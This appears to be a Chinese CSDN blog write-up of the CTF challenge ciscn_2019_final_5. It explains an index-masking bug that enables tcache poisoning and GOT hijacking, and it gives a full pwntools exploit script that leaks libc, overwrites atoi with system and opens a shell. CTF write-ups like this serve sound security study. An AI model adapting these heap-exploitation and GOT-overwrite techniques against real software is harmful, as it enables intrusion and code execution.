ciscn_2019_final_5(临界条件错误,劫持GOT)

最新推荐文章于 2022-02-28 10:59:50 发布
最新推荐文章于 2022-02-28 10:59:50 发布
阅读量629 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121275841
版权

ciscn_2019_final_5:

got表可写,pie没开
请添加图片描述

程序分析:

主界面:
请添加图片描述
add函数:
请添加图片描述
delete函数:
由于一般地址都会16位对齐,这里的free用按位与取前15位,最后一位为0
其实也没啥问题
请添加图片描述
edit函数:
和delete,都是取最后一位为下标
请添加图片描述

漏洞分析:

漏洞出现在add函数里的index我们能取0x10,即(0001 0000)
而它如果与倒数第五位为0的heap_ptr按位与的话会导致存进heap_list的地址变大0x10
例:我们申请第一个堆的地址最后三位一般为0x260(由于0x250的存在)
0x260(10 0110 0000)与0x10(1 0000)按位与后,delete或edit时为0x270请添加图片描述
free到bin链中是+0x10的地址

大致思路:

申请index为16的堆,布置好伪造的size,利用上面的特殊性质
可以释放到bin链中我们控制的size大小,造成堆块复用,我们改fd为heap_list的地址,add后,再add就申请到heap_list处了,我们劫持free_got
泄露libc,再劫持atoi为system,输入/bin/sh

exp:

from pwn import *
from LibcSearcher import *
local_file  = './ciscn_final_5'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('ctf.dino209.cn',9126 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
def add(index,size,content):
    sla('your choice: ','1')
    sla('index: ',str(index))
    sla('size: ',str(size))
    sa('content: ',content)
    ru('low 12 bits: 0x')
    return int(rc(3),16)
def delete(index):
    sla('your choice: ','2')
    sla('index: ',str(index))
def edit(index,content):
    sla('your choice: ','3')
    sla('index: ',str(index))
    sa('content: ',content)

#-------------------------------
heap_list=0x6020E0
free_got=0x602018#index 8
atoi_got=0x602078-7#index 1
puts_got=0x602020
add(16,0x20,p64(0)+p64(0x60))
add(1,0xb0,'ppp')
delete(0)
delete(1)
add(2,0x50,'a'*0x10+p64(0)+p64(0xc1)+p64(heap_list))
add(3,0xb0,'p')
add(4,0xb0,p64(atoi_got)+p64(puts_got)+p64(free_got)+p64(0)*17+p32(0x10)*4)
edit(8,p64(0)+p64(elf.sym['puts']))
delete(0)
libc_base=uu64(ru('\x7f')[-6:])-libc.sym['puts']
print 'libc_base='+str(hex(libc_base))
system=libc_base+libc.sym['system']
edit(1,p64(0)+p64(system))
sla('your choice: ','/bin/sh\x00')
#debug()
r.interactive()

其他:

参考师傅:
https://blog.csdn.net/weixin_44145820/article/details/105514596

Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN ciscn_2019_final_5(临界条件错误劫持GOT表项)
weixin_44145820的博客
04-14 984
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 368
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
ciscn_final_5
seaaseesa的博客
04-09 418
ciscn_final_5 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序将下标存储到了堆地址的低4位里 操作的时候再清除低4位地址值。 问题就在于当index为16的时候,低4位已经无法表示了,这就造成了溢出 假如我的堆地址为0x10,我的index为16,那么,经过运算,保存的地址为0x20,这样free的时候,就是free(0x20)。因此,我...
ciscn_2019_final_5
z1r0的博客
02-28 238
ciscn_2019_final_5 查看保护 当index为16的时候,经过运算保存的地址为0x20其实也就是heap的初初始地址+0x20。一开始没怎么看懂这些逻辑然后看了一下ha1vk的wp就懂了(XD 攻击思路:因为16的时候在堆的+0x20,所以只需要在堆里伪造一个堆块,然后释放再申请就可以改下面的一些堆块,把下面的堆块释放掉之后通过伪造的堆来改他们的fd达到任意地址申请即可。具体的tcache dup看z1r0’s blog from pwn import * context(arch=
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
buuctf ciscn_2019_final_5 calloc整理机制修改tcache的fd puts \0泄漏 signal信号
carol2358的博客
08-14 576
ciscn_2019_final_5 有趣的题目 涉及位级操作 漏洞的关键是index为16时,二进制为1 0000 edit 他们都是认heap_ptr里最后一个16进制来判断他是index几的,index1最后一位就是1,2就是2,8就是8,4就是4,但问题是他存储是按照你申请的顺序存的,和这个index没啥关系,漏洞就来了 这题很明显是要你改got表 没有show,就把free改成puts来泄漏 exp: from pwn import * from LibcSearcher import ...
lesson_test_calculator_final.rar_Final Test
09-19
标题 "lesson_test_calculator_final.rar_Final Test" 暗示我们正在处理一个关于软件开发的项目,特别是针对Symbian V3操作系统的一个最终测试版本。这个简易计算器是使用QT4框架在该平台上构建的,目的是作为新手...
lesson_test_calculator_final.rar_Final Test_calculator
09-21
在本项目中,我们关注的是一个名为"Final Test_calculator"的基于QT的计算器应用程序的开发。QT是一个跨平台的应用程序开发框架,广泛用于创建GUI(图形用户界面)应用程序。这个项目的重点是实现基本的算术运算,...
code-1_touch_switch_final_android_
10-04
【标题】"code-1_touch_switch_final_android_" 指的可能是一个Android应用程序项目,它涉及到使用触摸开关功能。在Android开发中,触摸事件处理是关键部分,允许用户通过触摸屏幕来与应用交互。这个项目可能是一个...
frps_2019_data_final.xls
02-28
2019美国Federal Reserve Payments Study. The study covered general-purpose and private-label credit, debit, and prepaid cards, electronic benefits transfers (EBT) cards, ACH transfers, wire transfers, ...
Final exercise.zip_C语言_DJZ_FINAL EXERCISES_期末大作业
07-15
【C语言_DJZ_FINAL EXERCISES_期末大作业】是本次讨论的主题,这是一个针对C语言编程的期末大作业,特别关注的是一个图书管理系统的实现。C语言是一种基础且强大的编程语言,常用于系统软件、应用软件以及游戏开发等...
pwnciscn_2019_final_3
Nothing
12-18 1694
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
4.13做题随记(axb_2019_heap, ciscn_2019_final_5)
eeeeeight的博客
04-14 174
4.13做题随记 Column: Apr 14, 2021 Tags: Pwn 相关文件链接 axb_2019_heap ciscn_2019_final_5 axb_2019_heap: 保护检查: 利用思路: banner()中存在明显的格式化字符串漏洞, 因此可以用来泄露栈地址, libc地址以及pie产生的偏移 get_input()中有单字节溢出, 可以修改下一个chunk的inuse位, 从而unlink 因此只要获得偏移后unlink到&note任意读写到malloc_hook, 写
ciscn2019部分writeup
Sea_Sand息禅
06-06 1294
Web 1、JustSoso 拿到源码 打开靶机,查看源码得到提示: 一看就是文件读取,然后就文件读取走一波。 file=php://filter/read=convert.base64-encode/resource=hint.php base64解码拿到hint.php的源码: <?php class Handle{ private $handle; ...
ciscn_2019_final_3
、moddemod
07-08 641
tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell… exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add(idx, size, content): p.sendlineafter('choice >', str(1)) p.sendl.
qctf2018_stack2(数组越界,偏移寻找)
m0_51251108的博客
11-12 747
qctf2018_stack2: 程序分析: 漏洞出现在change这里,没有对v5作边界检查,我们能造成越界,直接读数到ret地址 后门函数: 两个小trick: 1.我们都会以为偏移是0x70+4,而实际却是0x84 跟着这位师傅的文章调试: https://zhuanlan.zhihu.com/p/301091515 首先ida找到首次出现v13的地方,可以看到在for循环里 我们接着看这部分的Text view 断点下在0x80486ae,得到v13真实地址为0xffffd028 继续调
BUUCTF刷题1
m0_51251108的博客
05-19 338
BUUCTF刷题wp题目:babyheap_0ctf_2017:pwn2_sctf_2016:[ZJCTF 2019]EasyHeap:hitcontraining_uaf:babyfengshui_33c3_2016:pwnable_orw:picoctf_2018_buffer overflow 2:xdctf2015_pwn200:jarvisoj_level1:ciscn_2019_n_3:bbys_tu_2016:inndy_rop:roarctf_2019_easy_pwn:mrctf2020_
gyctf_2020_document(uaf)
m0_51251108的博客
11-14 994
gyctf_2020_document: 保护全开 漏洞分析: delete函数里指针未清零 大致思路: 这题限制了add时chunk的size,为0x8和0x80,edit时只能从+0x10处改0x70个字符 1.先add一个chunk,在add一个chunk,这个chunk里的name填/bin/sh\x00 (这时0x8chunk中存有指向binsh地址的指针了),我们释放第一个chunk,由于0x80大小,释放到unsortbin中,我们show,就能泄露libc 2.我们接下来的目的是控制申请
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3195
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
eda_res_package_final.tar.gz
最新发布
11-13
eda_res_package_final.tar.gz是一个文件的名称,该文件是被压缩的.tar.gz文件格式。根据后缀名可以推断出该文件是经过打包和压缩的文件。其中"eda_res_package_final"是该文件的名称,".tar.gz"表示该文件使用tar压缩算法和gzip压缩算法进行打包和压缩。 .tar.gz文件主要用于存储和传输大量的文件和目录。经过打包和压缩后,将多个文件和目录组合在一起,从而减少文件的大小和方便传输。用户可以使用压缩软件如WinRAR或7-Zip来解压和打开.tar.gz文件。 一旦解压后,用户将得到原始的文件和目录,可以在计算机上查看和使用这些文件。通常,.tar.gz文件在软件开发、数据备份、数据传输等方面广泛使用,因为它们将多个文件组合在一起并且可以有效地减小文件的大小。 总之,eda_res_package_final.tar.gz是一个被压缩,使用tar和gzip算法进行打包和压缩的文件,通过解压可以得到原始的文件和目录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值